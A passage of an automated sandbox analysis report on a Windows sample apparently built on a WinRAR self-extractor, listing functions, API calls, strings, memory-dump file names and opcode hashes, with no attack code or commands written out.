Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$d7
API String ID: 2691759472-501123111
Opcode ID: 9fbbc73040cf6f267ff47a6f5b1cc75bd02c77fd69b6e75634c810c334e89fa2
Instruction ID: 9d631afb3241bcaa25d0fb0a15328017d4a29417a695da9ecbf94eed46b42f26
Opcode Fuzzy Hash: 9fbbc73040cf6f267ff47a6f5b1cc75bd02c77fd69b6e75634c810c334e89fa2
Instruction Fuzzy Hash: 0CA13F7290012996DF36DBA0CD45EFA73FCAF44304F08C5A6E50DE7141EE789A858F60

Function 003675DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003675E3

Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0

Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036777F

Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532

Strings

:, xrefs: 00367654

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
Instruction ID: af77dee9b06b85dac19ec659d013d6712748f5d12c9cc128dc8f72dfdb494042
Opcode Fuzzy Hash: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
Instruction Fuzzy Hash: BF417071800258A9EB36EB64CC55EEEB37CAF45300F40C096B60AAB196DB745F84CF60

Function 0036B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0036B438
_wcschr.LIBVCRUNTIME ref: 0036B478

Strings

*, xrefs: 0036B38A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 5e576a3817ff3beeffb419839b83b97e5c1678a7bea92e2a062dae2141d6bb5e
Instruction ID: 32f21c07aa1e3d7bfe33f20ce7763ba7297c14eafeb5ab0b3d0166369af801b1
Opcode Fuzzy Hash: 5e576a3817ff3beeffb419839b83b97e5c1678a7bea92e2a062dae2141d6bb5e
Instruction Fuzzy Hash: 68310B362443019ACA33AE568902677F3E8DF91B50F16C41DF988D714BEF668DC29B61

Function 0037B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037B4E3
_wcslen.LIBCMT ref: 0037B4FE

Strings

}, xrefs: 0037B4D6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
Instruction ID: c8ba408154312c8094c68807685e20ad0a75dfb22302ca6dfff685e77ea517e9
Opcode Fuzzy Hash: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
Instruction Fuzzy Hash: FA21D47290430A5AD733EA64D845F6BF3ECDF82764F11442AF548C7141E778E94883A2

Function 0036F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0036F33E), ref: 0036F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0036F3CA
CryptProtectMemory failed, xrefs: 0036F389

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 25b2b885e896cf2e64aed38795ed5aba48416d310eb94924c3f6954ad71f51eb
Instruction ID: 0c164936150de98bf4dd0e09e7e5cd272ecb00d44e67134e0ad36fdcbf56e868
Opcode Fuzzy Hash: 25b2b885e896cf2e64aed38795ed5aba48416d310eb94924c3f6954ad71f51eb
Instruction Fuzzy Hash: E5112635A01629AFDF139F24EC46A6E3758FF01760F21C126FC416F359DA749D018790

Function 0037101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00371160,?,00000000,00000000), ref: 00371043
SetThreadPriority.KERNEL32(?,00000000), ref: 0037108A

Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54

Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E0A
Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E19

Strings

CreateThread failed, xrefs: 0037104F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 306c4f597524beda00cfb6f3e86671d1aa01ccd4940dcef51ebe931c646cfb21
Instruction ID: 8111aeb1f1fb66788c6c5d643f070ed42a21f2646c2df8c805eceb0b8759c50e
Opcode Fuzzy Hash: 306c4f597524beda00cfb6f3e86671d1aa01ccd4940dcef51ebe931c646cfb21
Instruction Fuzzy Hash: FE01AEB63443496FD7379F689C92F77735CEB41751F10402EF58756284CEA16C854624

Function 0036C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0036C080

Strings

?*<>|", xrefs: 0036C06D, 0036C07F
<99, xrefs: 0036C076

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcschr
String ID: <99$?*<>|"
API String ID: 2691759472-236475344
Opcode ID: eb51ca34d9504b5fa860e8b6f229893673f48e0be514ee34f39b50551d91bf62
Instruction ID: 2ee43fba1507d3ad25a6d780a1e9cdad5c42f0e3acbba9ac75588cbdd91e5529
Opcode Fuzzy Hash: eb51ca34d9504b5fa860e8b6f229893673f48e0be514ee34f39b50551d91bf62
Instruction Fuzzy Hash: C0F0A457A69741C5C7322F299801732F3E8EF95734F36A81EE5C5872C6E6A2C8C08665

Function 0037DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037DBAC

Strings

7, xrefs: 0037DB9F
Software\WinRAR SFX, xrefs: 0037DB95

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$7
API String ID: 176396367-33624352
Opcode ID: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
Instruction ID: 4edb5e6122842190707c9f1d0d8707a3f723702f4868c434b93280547c3c609a
Opcode Fuzzy Hash: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
Instruction Fuzzy Hash: B0018432500128BAEF339B51DC09FDF7F7CEF09751F008051B50AA5060D7B45A88C7A1

Function 0037AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2

Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FE5
Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FF6
Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372006
Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372014
Part of subcall function 00371FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F

Part of subcall function 0037AC04: SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08

_wcslen.LIBCMT ref: 0037AE8B

Strings

C:\Users\user\Desktop, xrefs: 0037AE68
<7, xrefs: 0037AEC4

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <7$C:\Users\user\Desktop
API String ID: 521417927-3960524650
Opcode ID: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
Instruction ID: 046537c110f44156d380ccd3cce8e4bcfa0ab97fb62549820d72bfa00a3f5065
Opcode Fuzzy Hash: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
Instruction Fuzzy Hash: 1E015271D00219A5DF23ABA4DD0AEDE72FCAF0D700F004456F609E7191E6B896448BA1

Function 0038BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863

_abort.LIBCMT ref: 0038BB80
_free.LIBCMT ref: 0038BBB4

Strings

p9, xrefs: 0038BBAB

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p9
API String ID: 289325740-1904256876
Opcode ID: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
Instruction ID: 8af0abf776e1d9bcefee598523577d213c433a441a7aa2b484288e20b6476298
Opcode Fuzzy Hash: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
Instruction Fuzzy Hash: 4C018071D01B22DBCB23FF69840162DF7A5BF04B20B1A019AE8646B295CB756D018FC1

Function 0037B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0037B42F

Strings

(7, xrefs: 0037B457
Z7, xrefs: 0037B441

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Malloc
String ID: (7$Z7
API String ID: 2696272793-1636684695
Opcode ID: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
Instruction ID: 704c36b0d40ca1d23c087077411247891e9e9a0cb014fb91f80dfbf4061a1757
Opcode Fuzzy Hash: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
Instruction Fuzzy Hash: 2801E4B6640119BF9F069FA1DD49CAEBBBDEF08344B108159B906D7120E631AA44DBA0

Function 00370FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00371206,?), ref: 00370FEA
GetLastError.KERNEL32(?), ref: 00370FF6

Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00370FFF

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: c955fbf5bd6c98b7533f6f3d2c8dadb1f579c3bd7cb794d718937fe8a107bfcd
Instruction ID: c51c6b1530d51d359f0886f6d17d918585e578af6cb6d4f58353dcf3c2951199
Opcode Fuzzy Hash: c955fbf5bd6c98b7533f6f3d2c8dadb1f579c3bd7cb794d718937fe8a107bfcd
Instruction Fuzzy Hash: 0FD05B7650493076C62333386C47DAF3908DB52771F514715F139652E5CA154D915691

Function 0036E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0036DA55,?), ref: 0036E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036DA55,?), ref: 0036E2B1

Strings

RTL, xrefs: 0036E2AB

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
Instruction ID: 0faca84771c2bb662c496ba56b0ee9b9174fc53d9d0639cc596d1385e7458fc2
Opcode Fuzzy Hash: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
Instruction Fuzzy Hash: 1FC0807124071066EB3227747C0DF836E5C9B01B15F05044DF142E93D1D6E7C944C7E0

Function 0037E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E467

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

p7, xrefs: 0037E470
z7, xrefs: 0037E461

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: p7$z7
API String ID: 1269201914-1647427826
Opcode ID: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
Instruction ID: c94ea8b97e8df488469b5a13f293d2929d8f7977068e158cc949e9e28d8901bf
Opcode Fuzzy Hash: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
Instruction Fuzzy Hash: 17B012C62A9040BC3257A1151C02E37015CC0C8F50330D06EF83DC4481DC484C000533

Function 0037E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E467

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

z7, xrefs: 0037E461
U7, xrefs: 0037E455

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: U7$z7
API String ID: 1269201914-2516247399
Opcode ID: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
Instruction ID: 574b132cf9873de47f0fc79d9deb62df0cf0af95fa764a257c2991338b786b76
Opcode Fuzzy Hash: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
Instruction Fuzzy Hash: 22B012D62680007C321711111D02D37021CC0C4F10330D06EF639C4481DC4C0E010433

Analysis Process: Mscommon.exePID: 8024, Parent PID: 7964COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAD0DA8 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5c11972d3ed0fef2075127aed808466d4a612123e6f5367ee6df31db03bdee
Instruction ID: 141a819d6b9e23bfebc08ada96c56d61a3bf5eb1bbcc64beb4915015e20268b4
Opcode Fuzzy Hash: da5c11972d3ed0fef2075127aed808466d4a612123e6f5367ee6df31db03bdee
Instruction Fuzzy Hash: 41A1C171A1994E8FE798DB68C8657A97FE1FF99314F4002BED048D72E6DB782805CB40

Function 00007FFD9BC8EC04 Relevance: 1.7, APIs: 1, Instructions: 163
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFD9BC8ED01

Memory Dump Source

Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

